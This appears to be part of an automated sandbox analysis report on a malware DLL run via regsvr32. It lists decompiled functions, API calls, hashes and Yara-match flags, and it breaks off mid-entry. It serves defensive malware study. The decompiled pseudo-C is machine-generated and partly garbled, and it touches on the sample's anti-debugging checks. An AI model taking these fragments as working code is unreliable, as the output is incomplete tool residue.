                                                                                                  • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                  • Instruction Fuzzy Hash: F841E77091C7848FDB64DF18D0C97DAB7E0FB98315F10495DE488C7296CB789884CB86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 422 18000d26c-18000d289 423 18000d2b4-18000d2c1 call 180008160 422->423 424 18000d28b-18000d29c call 1800086f4 call 1800085b8 422->424 429 18000d2c7-18000d2ce 423->429 437 18000d29e-18000d2b3 424->437 431 18000d306-18000d312 call 1800081b4 429->431 432 18000d2d0-18000d2db 429->432 431->437 434 18000d2dd 432->434 435 18000d2df call 18000d174 432->435 438 18000d301-18000d304 434->438 441 18000d2e4-18000d2eb 435->441 438->429 442 18000d2f2-18000d2fb 441->442 443 18000d2ed-18000d2f0 441->443 442->438 443->431
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
				E000000011800086F4(__ecx - 0x2000, __rax);
				 *__rax = 9;
				E000000011800085B8();
				return 9;
			}



                                                                                                  0x18000d26c
                                                                                                  0x18000d271
                                                                                                  0x18000d276
                                                                                                  0x18000d289
                                                                                                  0x18000d28b
                                                                                                  0x18000d295
                                                                                                  0x18000d297
                                                                                                  0x18000d2b3

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 3215553584-0
                                                                                                  • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                  • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                  • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                  • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 444 180008714-180008723 445 180008733-180008743 444->445 446 180008725-180008731 444->446 448 18000875a-180008772 RtlAllocateHeap 445->448 446->445 447 180008776-180008781 call 1800086f4 446->447 452 180008783-180008788 447->452 449 180008774 448->449 450 180008745-18000874c call 18000c08c 448->450 449->452 450->447 456 18000874e-180008758 call 18000abf8 450->456 456->447 456->448
                                                                                                  C-Code - Quality: 44%
                                                                                                  			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}






                                                                                                  0x180008714
                                                                                                  0x180008723
                                                                                                  0x180008727
                                                                                                  0x180008727
                                                                                                  0x180008731
                                                                                                  0x18000873f
                                                                                                  0x180008743
                                                                                                  0x18000874c
                                                                                                  0x180008758
                                                                                                  0x180008769
                                                                                                  0x180008772
                                                                                                  0x180008774
                                                                                                  0x180008776
                                                                                                  0x18000877b
                                                                                                  0x180008788

                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                  • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                  • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                  • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 71%
                                                                                                  			E00000001180001268(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
				if (E00000001180002A08() != 0) goto 0x80001297;
				goto 0x800012ab; // executed
				E00000001180006CDC(_t17); // executed
				if (0 != 0) goto 0x800012a9;
				E00000001180002A58(0);
				goto 0x80001293;
				return 1;
			}










                                                                                                  0x18000127c
                                                                                                  0x18000127f
                                                                                                  0x180001285
                                                                                                  0x180001291
                                                                                                  0x180001295
                                                                                                  0x180001297
                                                                                                  0x18000129e
                                                                                                  0x1800012a2
                                                                                                  0x1800012a7
                                                                                                  0x1800012b0

                                                                                                  APIs
                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                    • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                  • String ID:
                                                                                                  • API String ID: 108617051-0
                                                                                                  • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                  • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                  • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                  • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadString$ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 80118013-0
                                                                                                  • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                  • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                  • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                  • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3252650109-0
                                                                                                  • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                  • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                  • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                  • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3140674995-0
                                                                                                  • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                  • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                  • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                  • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 65%
                                                                                                  			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0x5388a1408558
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}













                                                                                                  0x1800082ec
                                                                                                  0x1800082f1
                                                                                                  0x1800082fa
                                                                                                  0x180008302
                                                                                                  0x180008309
                                                                                                  0x180008313
                                                                                                  0x180008324
                                                                                                  0x180008326
                                                                                                  0x180008332
                                                                                                  0x180008338
                                                                                                  0x180008343
                                                                                                  0x180008349
                                                                                                  0x180008353
                                                                                                  0x18000835c
                                                                                                  0x180008360
                                                                                                  0x180008365
                                                                                                  0x18000837a
                                                                                                  0x18000837d
                                                                                                  0x180008386
                                                                                                  0x180008388
                                                                                                  0x18000839b
                                                                                                  0x1800083a8
                                                                                                  0x1800083b1
                                                                                                  0x1800083b8
                                                                                                  0x1800083c5
                                                                                                  0x1800083d7
                                                                                                  0x1800083db
                                                                                                  0x1800083e9
                                                                                                  0x1800083ed
                                                                                                  0x1800083f1
                                                                                                  0x1800083fb
                                                                                                  0x18000840e
                                                                                                  0x180008412
                                                                                                  0x180008417
                                                                                                  0x180008446

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1239891234-0
                                                                                                  • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                  • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                  • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                  • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0F8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                  • API String ID: 0-182303197
                                                                                                  • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                  • Instruction ID: 9d0971f149300a2da1159f0feca88842b068e6ea0d0428c4b2198d388b2bb99c
                                                                                                  • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                  • Instruction Fuzzy Hash: AE122770A04709EFDB58DF68C08A99EBBF1FF48304F40816DE84AAB290D775DA59CB45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E15384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                  • API String ID: 0-557373213
                                                                                                  • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                  • Instruction ID: 5740a2682b6d2f9d2ab06866f6093be340be2060afb654ae031b95dd5cdc96fa
                                                                                                  • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                  • Instruction Fuzzy Hash: 75E1F27550160CCBDB68DF38C09A4D93BE1FF98308F611229FC6AA62A6DB74D954CB48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E08378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .I$gBfh$i[$w|${
                                                                                                  • API String ID: 0-448909954
                                                                                                  • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                  • Instruction ID: b413ddbe4629f4e3b19b58ec359cfc0ec743c4a5de5973c551d571d61cf2f970
                                                                                                  • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                  • Instruction Fuzzy Hash: A9B11670D247499FCB88DFA9D8898DDBBF0FB48304F40921DE856AB250C778A985CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cp$vm$x$zu$Kn#
                                                                                                  • API String ID: 0-3521309225
                                                                                                  • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                  • Instruction ID: 07970e9dc0c1bdee00f1dd6c159d6d88fe65fb2dbcf5e58c63fe41deeb5438d7
                                                                                                  • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                  • Instruction Fuzzy Hash: D6A104B1D143198FDB48CFA9D8898EEBBF0FB48318F109219E855B7290D3789945CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E17518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                  • API String ID: 0-817034907
                                                                                                  • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                  • Instruction ID: 3d5908fcfa391674b6ee9387de9aca38e7952ad2696c97e8c64d6398668a8648
                                                                                                  • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                  • Instruction Fuzzy Hash: 6341B2B180034E8FDB44CF64C88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ,$3T$D-$Rc$l
                                                                                                  • API String ID: 0-617906138
                                                                                                  • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                  • Instruction ID: 995aa847677b75af1083da945dfce8ef485a9efaaa3099ca7840384544ce87ea
                                                                                                  • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                  • Instruction Fuzzy Hash: 5341D5B081078E8FDB44CF64D88A4CE7BF0FB58358F105619E869A6260D3B89664CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}



                                                                                                  0x180001d98

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                  • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                  • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                  • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1CF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$ $UCV$y4.)
                                                                                                  • API String ID: 0-917551206
                                                                                                  • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                  • Instruction ID: 44654c129d285dc29b311b99fff53068072f5a5d2949e5141c347b6be4fe34f1
                                                                                                  • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                  • Instruction Fuzzy Hash: 3C12F5B1A0470C9FDB58DFA8E48A8DDBBF2FB48348F40412DE906A7290D7B5D809CB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E04EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
